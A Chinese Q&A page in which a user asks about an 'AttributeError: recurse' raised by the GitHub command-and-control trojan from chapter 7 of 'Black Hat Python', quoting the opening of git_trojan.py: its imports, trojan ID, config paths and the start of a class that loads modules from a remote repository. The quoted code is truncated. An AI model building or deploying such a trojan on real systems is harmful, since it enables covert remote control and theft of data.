小编000*_* 00的帖子

这个 AttributeError: recurse 是什么?相关黑帽python第7章github命令与控制

【我的开发环境】

root@kali:~# python

Python 2.7.3 (default, Mar 14 2014, 11:57:14) 

[GCC 4.7.2] on linux2
Run Code Online (Sandbox Code Playgroud)

参考网址

[这是示例源代码]

git_trojan.py

import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os

from github3 import login

trojan_id = "abc"

trojan_config = "%s.json" % trojan_id
data_path     = "data/%s/" % trojan_id
trojan_modules= []

task_queue    = Queue.Queue()
configured    = False

class GitImporter(object):

    def __init__(self):

        self.current_module_code = ""


    def find_module(self,fullname,path=None):

        if configured:
            print("[*] Attempting to retrieve %s" % fullname)
            new_library = …
Run Code Online (Sandbox Code Playgroud)

python linux github github-api

3
推荐指数
1
解决办法
480
查看次数

标签 统计

github ×1

github-api ×1

linux ×1

python ×1